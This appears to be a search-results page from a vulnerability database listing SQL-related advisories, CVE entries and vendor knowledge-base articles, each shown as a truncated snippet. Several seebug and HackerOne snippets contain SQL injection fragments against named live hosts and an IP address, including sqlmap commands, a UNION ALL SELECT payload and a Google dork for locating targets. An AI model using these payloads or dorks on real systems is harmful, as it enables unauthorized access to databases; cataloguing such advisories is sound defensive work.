
4418 matches found

Hacker One
added 2016/02/18 2:55 a.m. | 59 views

Informatica: [informatica.com] Blind SQL Injection

Hi guys! JSON POST parameter "docId" is vulnerable to Blind SQL Injection attack PoC Raw query POST /vtibin/RatingsCalculator/RatingsCalculator.asmx/CalculateRatings HTTP/1.1 User-Agent: Opera/9.80 Windows NT 6.1; WOW64 Presto/2.12.388 Version/12.17 Host: kb-test.informatica.com Accept-Language:...

AI score: 8.3
Exploits: 0
Veeam
added 2016/02/10 12:0 a.m. | 61 views

SQL VSS Writer is missing: databases will be backed up in crash-consistent state and transaction log processing will be skipped

Challenge A job displays the warning: SQL VSS Writer is missing: databases will be backed up in crash-consistent state and transaction log processing will be skipped Solution Support Scope Please note that the warning message displayed by Veeam Backup & Replication is a courtesy notification...

AI score: 7
Exploits: 0 | Affected Software: 1
CNVD
added 2016/01/23 12:0 a.m. | 1 views

Oracle MySQL Server: General Component Denial of Service Vulnerability

Oracle MySQL Server is an open source relational database management system. A security vulnerability in the MySQL Server: General component allows remote attackers to conduct denial of service attacks by submitting special requests...

CVSS: 2.1 | AI score: 8.3 | EPSS: 0.00591
Exploits: 0 | References: 1
seebug.org
added 2016/01/13 12:0 a.m. | 30 views

V5shop: SQL injection vulnerability in the spikeid parameter of cart.aspx

Example: search Google for inurl:productpic.aspx. cart.aspx normally requires a login to access, but this has no effect on the injection. Case: http://www.wolifu.com/cart.aspx?act=spikebuy&spikeid=3 D:\sqlmappython sqlmap.py -u "http://www.wolifu.com/cart.aspx?act=spikebuy&spik eid=3" -p "spikeid" | | 1.0-dev-nongit-20150806 | -| . | | | .'| . | || |||||,| | || ||...

AI score: 7.7
Exploits: 0
seebug.org
added 2015/12/07 12:0 a.m. | 28 views

Yonyou GRP system SQL injection

Brief description: Yonyou GRP system SQL injection. Detailed description: Yonyou GRP system SQL injection. Link: http://221.2.68.102:8888/R9iPortal/cm/cminfocontent.jsp?infoid=42 Injection parameter: Payload: infoid=-7911 UNION ALL SELECT 78,78,78,78,78,78,78,78,78,78,78,78, CHAR113+CHAR98+CHAR113+CHAR118+CHAR113+CHAR74+CHAR98+CHAR75+CHAR...

AI score: 7.7
Exploits: 0
Prion
added 2015/11/14 3:59 a.m. | 12 views

Design/Logic Flaw

IBM Tivoli Storage Manager for Databases: Data Protection for Microsoft SQL Server aka Spectrum Protect for Databases 5.5 before 5.5.6.2, 6.3 before 6.3.1.6, 6.4 before 6.4.1.8, and 7.1 before 7.1.4; Tivoli Storage Manager for Mail: Data Protection for Microsoft Exchange Server aka Spectrum Prote...

CVSS: 1.9 | AI score: 6.8 | EPSS: 0.00032
Exploits: 0 | References: 2 | Affected Software: 3
CVE
added 2015/11/14 2:0 a.m. | 44 views

CVE-2015-7404

CVE-2015-7404 affects IBM Tivoli Storage Manager products (Databases for SQL Server, Mail for Exchange, and FlashCopy Manager) when application tracing is enabled. The root issue is that the Change TSM Password operation (changetsmpassword) writes passwords in plaintext to application trace outpu...

CVSS: 1.9 | AI score: 6.3 | EPSS: 0.00032
Exploits: 0 | References: 2 | Affected Software: 2
Cvelist
added 2015/11/14 2:0 a.m. | 21 views

CVE-2015-7404

IBM Tivoli Storage Manager for Databases: Data Protection for Microsoft SQL Server aka Spectrum Protect for Databases 5.5 before 5.5.6.2, 6.3 before 6.3.1.6, 6.4 before 6.4.1.8, and 7.1 before 7.1.4; Tivoli Storage Manager for Mail: Data Protection for Microsoft Exchange Server aka Spectrum Prote...

AI score: 6.1 | EPSS: 0.00032
Exploits: 0 | References: 2
CNVD
added 2015/11/01 12:0 a.m. | 2 views

Multiple SQL Injection Vulnerabilities in Zend Framework MsSql and SQLite

Zend Framework is an open source PHP5 development framework, mainly used to develop Web programs and services. Multiple SQL injection vulnerabilities exist in Zend Framework MsSql and SQLite, allowing remote attackers to exploit the vulnerabilities to submit specially crafted SQL...

AI score: 8.1
Exploits: 0 | References: 1
CNVD
added 2015/10/22 12:0 a.m. | 1 views

Drupal Arbitrary SQL Command Execution Vulnerability

Drupal is an open source content management platform. An arbitrary SQL command execution vulnerability exists in the Drupal 7 driver for SQL Server and SQL Azure, versions 7.x-1.x prior to 7.x-1.4. It allows remote attackers to execute arbitrary SQL commands...

CVSS: 7.5 | AI score: 8.3 | EPSS: 0.00555
Exploits: 0 | References: 1
NVD
added 2015/10/21 2:59 p.m. | 13 views

CVE-2015-7876

The escapeLike function in sqlsrv/database.inc in the Drupal 7 driver for SQL Server and SQL Azure 7.x-1.x before 7.x-1.4 does not properly escape certain characters, which allows remote attackers to execute arbitrary SQL commands via vectors involving a module using the db_like function...

CVSS: 7.5 | AI score: 8 | EPSS: 0.00555
Exploits: 0 | References: 4
Prion
added 2015/10/21 2:59 p.m. | 15 views

SQL injection

The escapeLike function in sqlsrv/database.inc in the Drupal 7 driver for SQL Server and SQL Azure 7.x-1.x before 7.x-1.4 does not properly escape certain characters, which allows remote attackers to execute arbitrary SQL commands via vectors involving a module using the db_like function...

CVSS: 7.5 | AI score: 8.7 | EPSS: 0.00555
Exploits: 0 | References: 4 | Affected Software: 1
CVE
added 2015/10/21 2:0 p.m. | 43 views

CVE-2015-7876

CVE-2015-7876 concerns the Drupal 7 driver for SQL Server and SQL Azure (7.x-1.x prior to 7.x-1.4). The escapeLike function in sqlsrv/database.inc does not properly escape certain characters, enabling a remote attacker to execute arbitrary SQL commands via vectors involving a module using db_like...

CVSS: 7.5 | AI score: 8.3 | EPSS: 0.00555
Exploits: 0 | References: 4 | Affected Software: 1
Cvelist
added 2015/10/21 2:0 p.m. | 11 views

CVE-2015-7876

The escapeLike function in sqlsrv/database.inc in the Drupal 7 driver for SQL Server and SQL Azure 7.x-1.x before 7.x-1.4 does not properly escape certain characters, which allows remote attackers to execute arbitrary SQL commands via vectors involving a module using the db_like function...

AI score: 8 | EPSS: 0.00555
Exploits: 0 | References: 4
Veeam
added 2015/10/08 12:0 a.m. | 12 views

Release Notes for Veeam Backup & Replication 8.0 Update 3

More Recent Version Available Please find the latest version of Veeam Backup & Replication here: Veeam Downloads - Latest Version Challenge Release Notes for Veeam Backup & Replication 8.0 Update 3 Cause Please confirm you are running version 8.0.0.807, 8.0.0.817, 8.0.0.831, 8.0.0.917, 8.0.0.2018...

AI score: 7.4
Exploits: 0 | Affected Software: 1
Kitploit
added 2015/10/06 9:42 p.m. | 33 views

ZeroNet - Decentralized websites using Bitcoin crypto and BitTorrent network

Decentralized websites using Bitcoin crypto and the BitTorrent network - http://zeronet.io Why? We believe in open, free, and uncensored network and communication. No single point of failure: Site remains online so long as at least 1 peer serving it. No hosting costs: Sites are served by visitors...

AI score: 7.8
Exploits: 0 | References: 5
Veeam
added 2015/10/02 12:0 a.m. | 18 views

Remote execution of a PowerShell script fails when the VeeamBackup SQL database is on a remote SQL Server.

Challenge When using a PowerShell script that is intended to remotely execute a command upon the Veeam server, it may fail if the SQL instance that Veeam Backup & Replication is configured to use is on a different server. This KB article applies only if the following two statements are true. 1. A...

AI score: 7.8
Exploits: 0
seebug.org
added 2015/09/29 12:0 a.m. | 21 views

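e-cology time-based blind injection (hpid parameter)

1. Vulnerable file: homepage/LoginHomepage.jsp 2. Injection parameter: hpid 3. Vendor involved: Weaver Software (泛微软件) 4. Proof: sqlmap.py -u "http://localhost/homepage/LoginHomepage.jsp?hpid=52" --technique T --dbms "Microsoft SQL Server"...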

AI score: 7.6
Exploits: 0
Drupal
added 2015/09/16 12:0 a.m. | 23 views

Drupal 7 driver for SQL Server and SQL Azure - Moderately Critical - SQL Injection - SA-CONTRIB-2015-148

Drupal 7 driver for SQL Server and SQL Azure module has a SQL injection vulnerability. Certain characters aren't properly escaped by the Drupal database API. A malicious user may be able to access restricted information by performing a specially-crafted search. Only sites that use contrib or cust...

CVSS: 7.5 | AI score: 7 | EPSS: 0.00555
Exploits: 0 | References: 11
seebug.org
added 2015/09/07 12:0 a.m. | 29 views

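Langbang content management system SQL injection vulnerability /bssh

Langbang content management system, currently at version V8.0; development language: ASP.NET 4.0; database: SQL2005; runtime environment: Windows2003/NT + IIS6.0. It is mainly used for building websites for government bodies, schools, enterprises and institutions, and individuals in Guizhou and other regions. /Webwsfw/bssh/?subsite=1%20and%201select%20@@version-- !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils...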

AI score: 7.1
Exploits: 0